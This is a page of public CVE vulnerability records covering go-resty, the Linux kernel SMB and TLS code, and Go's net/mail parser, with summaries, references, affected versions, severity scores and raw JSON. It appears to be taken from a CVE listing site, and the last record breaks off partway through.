Vendor | Product | Version | |
---|---|---|---|
▼ | github.com/go-resty/resty/v2 | github.com/go-resty/resty/v2 |
Version: 2.10.0 ≤ |
|
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-02T20:21:15.309Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://github.com/go-resty/resty/issues/743" }, { "tags": [ "x_transferred" ], "url": "https://github.com/go-resty/resty/issues/739" }, { "tags": [ "x_transferred" ], "url": "https://github.com/go-resty/resty/pull/745" }, { "tags": [ "x_transferred" ], "url": "https://github.com/go-resty/resty/commit/577fed8730d79f583eb48dfc81674164e1fc471e" }, { "tags": [ "x_transferred" ], "url": "https://pkg.go.dev/vuln/GO-2023-2328" } ], "title": "CVE Program Container" }, { "metrics": [ { "other": { "content": { "id": "CVE-2023-45286", "options": [ { "Exploitation": "none" }, { "Automatable": "no" }, { "Technical Impact": "partial" } ], "role": "CISA Coordinator", "timestamp": "2024-08-28T20:00:00.708483Z", "version": "2.0.3" }, "type": "ssvc" } } ], "providerMetadata": { "dateUpdated": "2024-08-28T20:01:23.626Z", "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "shortName": "CISA-ADP" }, "title": "CISA ADP Vulnrichment" } ], "cna": { "affected": [ { "collectionURL": "https://pkg.go.dev", "defaultStatus": "unaffected", "packageName": "github.com/go-resty/resty/v2", "product": "github.com/go-resty/resty/v2", "programRoutines": [ { "name": "handleRequestBody" }, { "name": "Backoff" }, { "name": "Request.Delete" }, { "name": "Request.Execute" }, { "name": "Request.Get" }, { "name": "Request.Head" }, { "name": "Request.Options" }, { "name": "Request.Patch" }, { "name": "Request.Post" }, { "name": "Request.Put" }, { "name": "Request.Send" } ], "vendor": "github.com/go-resty/resty/v2", "versions": [ { "lessThan": "2.11.0", "status": "affected", "version": "2.10.0", "versionType": "semver" } ] } ], "credits": [ { "lang": "en", "value": "Logan Attwood (@lattwood)" } ], "descriptions": [ { "lang": "en", "value": "A race condition in go-resty can result in HTTP request body disclosure across requests. This condition can be triggered by calling sync.Pool.Put with the same *bytes.Buffer more than once, when request retries are enabled and a retry occurs. The call to sync.Pool.Get will then return a bytes.Buffer that hasn\u0027t had bytes.Buffer.Reset called on it. This dirty buffer will contain the HTTP request body from an unrelated request, and go-resty will append the current HTTP request body to it, sending two bodies in one request. The sync.Pool in question is defined at package level scope, so a completely unrelated server could receive the request body." } ], "problemTypes": [ { "descriptions": [ { "description": "CWE-200: Exposure of Sensitive Information to an Unauthorized Actor", "lang": "en" } ] } ], "providerMetadata": { "dateUpdated": "2024-01-04T18:41:48.460Z", "orgId": "1bb62c36-49e3-4200-9d77-64a1400537cc", "shortName": "Go" }, "references": [ { "url": "https://github.com/go-resty/resty/issues/743" }, { "url": "https://github.com/go-resty/resty/issues/739" }, { "url": "https://github.com/go-resty/resty/pull/745" }, { "url": "https://github.com/go-resty/resty/commit/577fed8730d79f583eb48dfc81674164e1fc471e" }, { "url": "https://pkg.go.dev/vuln/GO-2023-2328" } ], "title": "HTTP request body disclosure in github.com/go-resty/resty/v2" } }, "cveMetadata": { "assignerOrgId": "1bb62c36-49e3-4200-9d77-64a1400537cc", "assignerShortName": "Go", "cveId": "CVE-2023-45286", "datePublished": "2023-11-28T16:31:21.078Z", "dateReserved": "2023-10-06T17:06:26.221Z", "dateUpdated": "2024-08-28T20:01:23.626Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2024-0565
Vulnerability from cvelistv5
Published
2024-01-15 20:02
Modified
2024-11-15 15:27
Severity ?
EPSS score ?
Summary
An out-of-bounds memory read flaw was found in receive_encrypted_standard in fs/smb/client/smb2ops.c in the SMB Client sub-component in the Linux Kernel. This issue occurs due to integer underflow on the memcpy length, leading to a denial of service.
References
▼ | URL | Tags |
---|---|---|
https://access.redhat.com/errata/RHSA-2024:1188 | vendor-advisory, x_refsource_REDHAT | |
https://access.redhat.com/errata/RHSA-2024:1404 | vendor-advisory, x_refsource_REDHAT | |
https://access.redhat.com/errata/RHSA-2024:1532 | vendor-advisory, x_refsource_REDHAT | |
https://access.redhat.com/errata/RHSA-2024:1533 | vendor-advisory, x_refsource_REDHAT | |
https://access.redhat.com/errata/RHSA-2024:1607 | vendor-advisory, x_refsource_REDHAT | |
https://access.redhat.com/errata/RHSA-2024:1614 | vendor-advisory, x_refsource_REDHAT | |
https://access.redhat.com/errata/RHSA-2024:2093 | vendor-advisory, x_refsource_REDHAT | |
https://access.redhat.com/errata/RHSA-2024:2394 | vendor-advisory, x_refsource_REDHAT | |
https://access.redhat.com/security/cve/CVE-2024-0565 | vdb-entry, x_refsource_REDHAT | |
https://bugzilla.redhat.com/show_bug.cgi?id=2258518 | issue-tracking, x_refsource_REDHAT | |
https://www.spinics.net/lists/stable-commits/msg328851.html |
Impacted products
Vendor | Product | Version | |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
▼ |
Version: 0 ≤ |
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
|
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-01T18:11:35.146Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "name": "RHSA-2024:1188", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:1188" }, { "name": "RHSA-2024:1404", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:1404" }, { "name": "RHSA-2024:1532", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:1532" }, { "name": "RHSA-2024:1533", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:1533" }, { "name": "RHSA-2024:1607", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:1607" }, { "name": "RHSA-2024:1614", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:1614" }, { "name": "RHSA-2024:2093", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:2093" }, { "name": "RHSA-2024:2394", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:2394" }, { "tags": [ "vdb-entry", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/security/cve/CVE-2024-0565" }, { "name": "RHBZ#2258518", "tags": [ "issue-tracking", "x_refsource_REDHAT", "x_transferred" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2258518" }, { "tags": [ "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html" }, { "tags": [ "x_transferred" ], "url": "https://security.netapp.com/advisory/ntap-20240223-0002/" }, { "tags": [ "x_transferred" ], "url": "https://www.spinics.net/lists/stable-commits/msg328851.html" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "collectionURL": "https://git.kernel.org/pub/scm/linux/kernel", "defaultStatus": "unaffected", "packageName": "kernel", "versions": [ { "lessThan": "6.7-rc6", "status": "affected", "version": "0", "versionType": "semver" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:enterprise_linux:8::realtime", "cpe:/a:redhat:enterprise_linux:8::nfv" ], "defaultStatus": "affected", "packageName": "kernel-rt", "product": "Red Hat Enterprise Linux 8", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:4.18.0-513.24.1.rt7.326.el8_9", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:8::baseos", "cpe:/a:redhat:enterprise_linux:8::crb" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 8", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:4.18.0-513.24.1.el8_9", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:rhev_hypervisor:4.4::el8", "cpe:/a:redhat:rhel_eus:8.6::crb", "cpe:/o:redhat:rhel_eus:8.6::baseos" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 8.6 Extended Update Support", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:4.18.0-372.95.1.el8_6", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:rhel_eus:8.8::baseos", "cpe:/a:redhat:rhel_eus:8.8::crb" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 8.8 Extended Update Support", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:4.18.0-477.51.1.el8_8", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:enterprise_linux:9::crb", "cpe:/o:redhat:enterprise_linux:9::baseos", "cpe:/a:redhat:enterprise_linux:9::nfv", "cpe:/a:redhat:enterprise_linux:9::realtime", "cpe:/a:redhat:enterprise_linux:9::appstream" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 9", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:5.14.0-427.13.1.el9_4", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:enterprise_linux:9::crb", "cpe:/o:redhat:enterprise_linux:9::baseos", "cpe:/a:redhat:enterprise_linux:9::nfv", "cpe:/a:redhat:enterprise_linux:9::realtime", "cpe:/a:redhat:enterprise_linux:9::appstream" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 9", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:5.14.0-427.13.1.el9_4", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:rhel_eus:9.2::crb", "cpe:/a:redhat:rhel_eus:9.2::appstream", "cpe:/o:redhat:rhel_eus:9.2::baseos" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 9.2 Extended Update Support", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:5.14.0-284.59.1.el9_2", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:rhel_eus:9.2::nfv", "cpe:/a:redhat:rhel_eus:9.2::realtime" ], "defaultStatus": "affected", "packageName": "kernel-rt", "product": "Red Hat Enterprise Linux 9.2 Extended Update Support", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:5.14.0-284.59.1.rt14.344.el9_2", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:rhev_hypervisor:4.4::el8", "cpe:/a:redhat:rhel_eus:8.6::crb", "cpe:/o:redhat:rhel_eus:8.6::baseos" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Virtualization 4 for Red Hat Enterprise Linux 8", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:4.18.0-372.95.1.el8_6", "versionType": "rpm" } ] }, { "collectionURL": "https://catalog.redhat.com/software/containers/", "cpes": [ "cpe:/a:redhat:logging:5.7::el8" ], "defaultStatus": "affected", "packageName": "openshift-logging/cluster-logging-operator-bundle", "product": "RHOL-5.7-RHEL-8", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "v5.7.13-16", "versionType": "rpm" } ] }, { "collectionURL": "https://catalog.redhat.com/software/containers/", "cpes": [ "cpe:/a:redhat:logging:5.7::el8" ], "defaultStatus": "affected", "packageName": "openshift-logging/cluster-logging-rhel8-operator", "product": "RHOL-5.7-RHEL-8", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "v5.7.13-7", "versionType": "rpm" } ] }, { "collectionURL": "https://catalog.redhat.com/software/containers/", "cpes": [ "cpe:/a:redhat:logging:5.7::el8" ], "defaultStatus": "affected", "packageName": "openshift-logging/elasticsearch6-rhel8", "product": "RHOL-5.7-RHEL-8", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "v6.8.1-408", "versionType": "rpm" } ] }, { "collectionURL": "https://catalog.redhat.com/software/containers/", "cpes": [ "cpe:/a:redhat:logging:5.7::el8" ], "defaultStatus": "affected", "packageName": "openshift-logging/elasticsearch-operator-bundle", "product": "RHOL-5.7-RHEL-8", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "v5.7.13-19", "versionType": "rpm" } ] }, { "collectionURL": "https://catalog.redhat.com/software/containers/", "cpes": [ "cpe:/a:redhat:logging:5.7::el8" ], "defaultStatus": "affected", "packageName": "openshift-logging/elasticsearch-proxy-rhel8", "product": "RHOL-5.7-RHEL-8", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "v1.0.0-480", "versionType": "rpm" } ] }, { "collectionURL": "https://catalog.redhat.com/software/containers/", "cpes": [ "cpe:/a:redhat:logging:5.7::el8" ], "defaultStatus": "affected", "packageName": "openshift-logging/elasticsearch-rhel8-operator", "product": "RHOL-5.7-RHEL-8", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "v5.7.13-9", "versionType": "rpm" } ] }, { "collectionURL": "https://catalog.redhat.com/software/containers/", "cpes": [ "cpe:/a:redhat:logging:5.7::el8" ], "defaultStatus": "affected", "packageName": "openshift-logging/eventrouter-rhel8", "product": "RHOL-5.7-RHEL-8", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "v0.4.0-248", "versionType": "rpm" } ] }, { "collectionURL": "https://catalog.redhat.com/software/containers/", "cpes": [ "cpe:/a:redhat:logging:5.7::el8" ], "defaultStatus": "affected", "packageName": "openshift-logging/fluentd-rhel8", "product": "RHOL-5.7-RHEL-8", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "v1.14.6-215", "versionType": "rpm" } ] }, { "collectionURL": "https://catalog.redhat.com/software/containers/", "cpes": [ "cpe:/a:redhat:logging:5.7::el8" ], "defaultStatus": "affected", "packageName": "openshift-logging/kibana6-rhel8", "product": "RHOL-5.7-RHEL-8", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "v6.8.1-431", "versionType": "rpm" } ] }, { "collectionURL": "https://catalog.redhat.com/software/containers/", "cpes": [ "cpe:/a:redhat:logging:5.7::el8" ], "defaultStatus": "affected", "packageName": "openshift-logging/log-file-metric-exporter-rhel8", "product": "RHOL-5.7-RHEL-8", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "v1.1.0-228", "versionType": "rpm" } ] }, { "collectionURL": "https://catalog.redhat.com/software/containers/", "cpes": [ "cpe:/a:redhat:logging:5.7::el8" ], "defaultStatus": "affected", "packageName": "openshift-logging/logging-curator5-rhel8", "product": "RHOL-5.7-RHEL-8", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "v5.8.1-471", "versionType": "rpm" } ] }, { "collectionURL": "https://catalog.redhat.com/software/containers/", "cpes": [ "cpe:/a:redhat:logging:5.7::el8" ], "defaultStatus": "affected", "packageName": "openshift-logging/logging-loki-rhel8", "product": "RHOL-5.7-RHEL-8", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "v2.9.6-15", "versionType": "rpm" } ] }, { "collectionURL": "https://catalog.redhat.com/software/containers/", "cpes": [ "cpe:/a:redhat:logging:5.7::el8" ], "defaultStatus": "affected", "packageName": "openshift-logging/logging-view-plugin-rhel8", "product": "RHOL-5.7-RHEL-8", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "v5.7.13-3", "versionType": "rpm" } ] }, { "collectionURL": "https://catalog.redhat.com/software/containers/", "cpes": [ "cpe:/a:redhat:logging:5.7::el8" ], "defaultStatus": "affected", "packageName": "openshift-logging/loki-operator-bundle", "product": "RHOL-5.7-RHEL-8", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "v5.7.13-27", "versionType": "rpm" } ] }, { "collectionURL": "https://catalog.redhat.com/software/containers/", "cpes": [ "cpe:/a:redhat:logging:5.7::el8" ], "defaultStatus": "affected", "packageName": "openshift-logging/loki-rhel8-operator", "product": "RHOL-5.7-RHEL-8", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "v5.7.13-12", "versionType": "rpm" } ] }, { "collectionURL": "https://catalog.redhat.com/software/containers/", "cpes": [ "cpe:/a:redhat:logging:5.7::el8" ], "defaultStatus": "affected", "packageName": "openshift-logging/lokistack-gateway-rhel8", "product": "RHOL-5.7-RHEL-8", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "v0.1.0-527", "versionType": "rpm" } ] }, { "collectionURL": "https://catalog.redhat.com/software/containers/", "cpes": [ "cpe:/a:redhat:logging:5.7::el8" ], "defaultStatus": "affected", "packageName": "openshift-logging/opa-openshift-rhel8", "product": "RHOL-5.7-RHEL-8", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "v0.1.0-225", "versionType": "rpm" } ] }, { "collectionURL": "https://catalog.redhat.com/software/containers/", "cpes": [ "cpe:/a:redhat:logging:5.7::el8" ], "defaultStatus": "affected", "packageName": "openshift-logging/vector-rhel8", "product": "RHOL-5.7-RHEL-8", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "v0.28.1-57", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:6" ], "defaultStatus": "unaffected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 6", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:7" ], "defaultStatus": "unaffected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 7", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:7" ], "defaultStatus": "unaffected", "packageName": "kernel-rt", "product": "Red Hat Enterprise Linux 7", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:9" ], "defaultStatus": "affected", "packageName": "kernel-rt", "product": "Red Hat Enterprise Linux 9", "vendor": "Red Hat" } ], "datePublic": "2023-12-18T00:00:00+00:00", "descriptions": [ { "lang": "en", "value": "An out-of-bounds memory read flaw was found in receive_encrypted_standard in fs/smb/client/smb2ops.c in the SMB Client sub-component in the Linux Kernel. This issue occurs due to integer underflow on the memcpy length, leading to a denial of service." } ], "metrics": [ { "other": { "content": { "namespace": "https://access.redhat.com/security/updates/classification/", "value": "Moderate" }, "type": "Red Hat severity rating" } }, { "cvssV3_1": { "attackComplexity": "HIGH", "attackVector": "ADJACENT_NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.8, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:A/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "format": "CVSS" } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-191", "description": "Integer Underflow (Wrap or Wraparound)", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2024-11-15T15:27:39.597Z", "orgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "shortName": "redhat" }, "references": [ { "name": "RHSA-2024:1188", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:1188" }, { "name": "RHSA-2024:1404", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:1404" }, { "name": "RHSA-2024:1532", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:1532" }, { "name": "RHSA-2024:1533", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:1533" }, { "name": "RHSA-2024:1607", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:1607" }, { "name": "RHSA-2024:1614", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:1614" }, { "name": "RHSA-2024:2093", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:2093" }, { "name": "RHSA-2024:2394", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:2394" }, { "tags": [ "vdb-entry", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/security/cve/CVE-2024-0565" }, { "name": "RHBZ#2258518", "tags": [ "issue-tracking", "x_refsource_REDHAT" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2258518" }, { "url": "https://www.spinics.net/lists/stable-commits/msg328851.html" } ], "timeline": [ { "lang": "en", "time": "2024-01-15T00:00:00+00:00", "value": "Reported to Red Hat." }, { "lang": "en", "time": "2023-12-18T00:00:00+00:00", "value": "Made public." } ], "title": "Kernel: cifs filesystem decryption improper input validation remote code execution vulnerability in function receive_encrypted_standard of client", "workarounds": [ { "lang": "en", "value": "To mitigate this issue, prevent module cifs from being loaded. Please see https://access.redhat.com/solutions/41278 for how to blacklist a kernel module to prevent it from loading automatically." } ], "x_redhatCweChain": "CWE-191: Integer Underflow (Wrap or Wraparound)" } }, "cveMetadata": { "assignerOrgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "assignerShortName": "redhat", "cveId": "CVE-2024-0565", "datePublished": "2024-01-15T20:02:02.639Z", "dateReserved": "2024-01-15T19:19:12.076Z", "dateUpdated": "2024-11-15T15:27:39.597Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2024-24784
Vulnerability from cvelistv5
Published
2024-03-05 22:22
Modified
2024-08-05 20:17
Severity ?
EPSS score ?
Summary
The ParseAddressList function incorrectly handles comments (text within parentheses) within display names. Since this is a misalignment with conforming address parsers, it can result in different trust decisions being made by programs using different parsers.
References
Impacted products
Vendor | Product | Version | |
---|---|---|---|
▼ | Go standard library | net/mail |
Version: 0 ≤ Version: 1.22.0-0 ≤ |
|
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-01T23:28:12.523Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://go.dev/issue/65083" }, { "tags": [ "x_transferred" ], "url": "https://go.dev/cl/555596" }, { "tags": [ "x_transferred" ], "url": "https://groups.google.com/g/golang-announce/c/5pwGVUPoMbg" }, { "tags": [ "x_transferred" ], "url": "https://pkg.go.dev/vuln/GO-2024-2609" }, { "tags": [ "x_transferred" ], "url": "https://security.netapp.com/advisory/ntap-20240329-0007/" }, { "tags": [ "x_transferred" ], "url": "http://www.openwall.com/lists/oss-security/2024/03/08/4" } ], "title": "CVE Program Container" }, { "affected": [ { "cpes": [ "cpe:2.3:a:go_standard_library:net\\/mail:*:*:*:*:*:*:*:*" ], "defaultStatus": "unknown", "product": "net\\/mail", "vendor": "go_standard_library", "versions": [ { "lessThan": "1.21.8", "status": "affected", "version": "0", "versionType": "semver" }, { "lessThan": "1.22.1", "status": "affected", "version": "1.22.0-0", "versionType": "semver" } ] } ], "metrics": [ { "cvssV3_1": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.1" } }, { "other": { "content": { "id": "CVE-2024-24784", "options": [ { "Exploitation": "none" }, { "Automatable": "yes" }, { "Technical Impact": "partial" } ], "role": "CISA Coordinator", "timestamp": "2024-08-05T20:13:24.512123Z", "version": "2.0.3" }, "type": "ssvc" } } ], "providerMetadata": { "dateUpdated": "2024-08-05T20:17:30.349Z", "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "shortName": "CISA-ADP" }, "title": "CISA ADP Vulnrichment" } ], "cna": { "affected": [ { "collectionURL": "https://pkg.go.dev", "defaultStatus": "unaffected", "packageName": "net/mail", "product": "net/mail", "programRoutines": [ { "name": "addrParser.consumeGroupList" }, { "name": "addrParser.consumePhrase" }, { "name": "isAtext" }, { "name": "Address.String" }, { "name": "AddressParser.Parse" }, { "name": "AddressParser.ParseList" }, { "name": "Header.AddressList" }, { "name": "ParseAddress" }, { "name": "ParseAddressList" } ], "vendor": "Go standard library", "versions": [ { "lessThan": "1.21.8", "status": "affected", "version": "0", "versionType": "semver" }, { "lessThan": "1.22.1", "status": "affected", "version": "1.22.0-0", "versionType": "semver" } ] } ], "credits": [ { "lang": "en", "value": "Juho Nurminen of Mattermost" }, { "lang": "en", "value": "Slonser (https://github.com/Slonser)" } ], "descriptions": [ { "lang": "en", "value": "The ParseAddressList function incorrectly handles comments (text within parentheses) within display names. Since this is a misalignment with conforming address parsers, it can result in different trust decisions being made by programs using different parsers." } ], "problemTypes": [ { "descriptions": [ { "description": "CWE-150: Improper Neutralization of Escape, Meta, or Control Sequences", "lang": "en" } ] } ], "providerMetadata": { "dateUpdated": "2024-03-05T22:22:32.186Z", "orgId": "1bb62c36-49e3-4200-9d77-64a1400537cc", "shortName": "Go" }, "references": [ { "url": "https://go.dev/issue/65083" }, { "url": "https://go.dev/cl/555596" }, { "url": "https://groups.google.com/g/golang-announce/c/5pwGVUPoMbg" }, { "url": "https://pkg.go.dev/vuln/GO-2024-2609" }, { "url": "https://security.netapp.com/advisory/ntap-20240329-0007/" }, { "url": "http://www.openwall.com/lists/oss-security/2024/03/08/4" } ], "title": "Comments in display names are incorrectly handled in net/mail" } }, "cveMetadata": { "assignerOrgId": "1bb62c36-49e3-4200-9d77-64a1400537cc", "assignerShortName": "Go", "cveId": "CVE-2024-24784", "datePublished": "2024-03-05T22:22:32.186Z", "dateReserved": "2024-01-30T16:05:14.757Z", "dateUpdated": "2024-08-05T20:17:30.349Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2024-26584
Vulnerability from cvelistv5
Published
2024-02-21 14:59
Modified
2024-12-19 08:42
Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
net: tls: handle backlogging of crypto requests
Since we're setting the CRYPTO_TFM_REQ_MAY_BACKLOG flag on our
requests to the crypto API, crypto_aead_{encrypt,decrypt} can return
-EBUSY instead of -EINPROGRESS in valid situations. For example, when
the cryptd queue for AESNI is full (easy to trigger with an
artificially low cryptd.cryptd_max_cpu_qlen), requests will be enqueued
to the backlog but still processed. In that case, the async callback
will also be called twice: first with err == -EINPROGRESS, which it
seems we can just ignore, then with err == 0.
Compared to Sabrina's original patch this version uses the new
tls_*crypt_async_wait() helpers and converts the EBUSY to
EINPROGRESS to avoid having to modify all the error handling
paths. The handling is identical.
References
Impacted products
Vendor | Product | Version | |||||
---|---|---|---|---|---|---|---|
▼ | Linux | Linux |
Version: a54667f6728c2714a400f3c884727da74b6d1717 Version: a54667f6728c2714a400f3c884727da74b6d1717 Version: a54667f6728c2714a400f3c884727da74b6d1717 Version: a54667f6728c2714a400f3c884727da74b6d1717 Version: a54667f6728c2714a400f3c884727da74b6d1717 |
||||
|
